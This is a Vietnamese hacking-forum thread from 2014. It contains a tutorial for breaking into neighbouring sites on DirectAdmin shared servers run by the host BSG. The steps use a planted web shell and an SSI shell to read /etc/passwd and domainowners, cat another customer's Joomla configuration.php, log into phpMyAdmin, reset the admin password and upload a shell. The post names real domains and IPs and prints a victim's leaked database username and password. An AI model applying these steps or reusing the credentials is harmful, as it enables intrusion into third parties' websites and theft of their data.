[hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Chia sẻ kiến thức trên các lĩnh vực khác

Các điều hành viên: Admin, Mod, SMod

[hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Gửi bàigửi bởi Ghost » 02/03/2014 21:25

Trước tiên là cần shell :
http://hyundaicounty.com/images/vic.php< victoria
Không cần để ý tới hàm nó disable bao nhiêu, nhìn vào cái server là được ( dựa theo kinh nghiệm local )
vào check-host.net > check hyundaicounty.com > info
Sẽ ra : Host name ln03.bsg.vn < nó chạy sv bsg
BSG quẩy tốt, sv chạy direct thì chắc chỉ ngại bkns và powernet ( powernet bởi vì ngày trước mình có contact lỗi này cho bên đấy nên nó fix hết quá nhọ
Bây giờ check quyền Server: - id: () - uid= () gid=603() < đủ quyền
Safe_mode : On < không có quyền thực thi lệnh, nhưng không sao bởi vì đối với những sv chạy direct ta chỉ cần hạ quyền xuống apache, chứ đừng thằng nào dại mà symlink sv chạy direct nhé
Khi đổi sang chạy shell = ip/~user thì nó sẽ tự hạ quyền xuống apache, nhưng chắc chắn sẽ không chạy được shell php hoặc perl, nhưng không sao shtml, html vẫn chạy tốt
Giờ ta up 1 con shell shtml lên, và quẩy thôi
http://123.30.181.39/~otohncom/images/ssi.shtml ?
Kiểm tra quyền : id
Sẽ được : uid=101(apache)gid=501(apache)groups=501(apache),503(access)
Quyền đã được hạ, bây giờ ta dùng dir or cat
dir : lệnh xem thư mục trong linux
cat : lệnh xem file trong linux
Xác định victim thực thi lệnh : cat/etc/passwd hoặc cat/etc/virtual/domainowners < đối với server chạy DA
Ví dụ victim : gvth.net user là : vannhan
ta sử dụng : dir -ao/home/vannhan/domains/gvth.net/public_html < để xem thư mục public_html của victim
Tiếp theo tìm config < chưa user pass database của victim
Victim chạy joomla > config sẽ là > configuration.php
Ta sử dụng : cat/home/vannhan/domains/gvth.net/public_html/configuration.php để view source của file configuration.php
Sẽ ra db là :
var $user = 'vannhan_vannhan';
var $db = 'vannhan_dulieu';
var $password = 'WQUnkOZe';
Bước tiếp theo là connect tới mysql bằng http://123.30.181.39/phpmyadmin< chỉ đối với sv chạy DA mới có nhé
Change pass joomla bằng md5 > login vào admin của victim và upload shell
End Tut
Sửa lần cuối: Ghost 02/03/2014 21:27

Đặng Lê Minh Nguyên


FACEBOOK
Hình đại diện của thành viên
Ghost
☀️11/30☀️
☀️11/30☀️
 
Bài viết: 1316
Ngày tham gia: 08/12/2012 17:13
Đến từ: Thanh hóa
Số điện thoại: 01629340152

Re: [hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Gửi bàigửi bởi Ghost » 02/03/2014 21:28

Thêm tí cho newbie nếu muốn biết sv có chạy DA thì thử xem nó có open port 2222 ko

http://123.30.181.39:2222/

Đặng Lê Minh Nguyên


FACEBOOK
Hình đại diện của thành viên
Ghost
☀️11/30☀️
☀️11/30☀️
 
Bài viết: 1316
Ngày tham gia: 08/12/2012 17:13
Đến từ: Thanh hóa
Số điện thoại: 01629340152

Re: [hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Gửi bàigửi bởi Ghost » 02/03/2014 21:53

Up top..chẳng ai quan tâm..mất công viết bài

Đặng Lê Minh Nguyên


FACEBOOK
Hình đại diện của thành viên
Ghost
☀️11/30☀️
☀️11/30☀️
 
Bài viết: 1316
Ngày tham gia: 08/12/2012 17:13
Đến từ: Thanh hóa
Số điện thoại: 01629340152


Quay về Kiến thức khác

 


  • Chủ đề tương tự
    Trả lời
    Xem
    Bài viết mới nhất

Ai đang trực tuyến?

Đang xem chuyên mục này: Bing [Bot]120 khách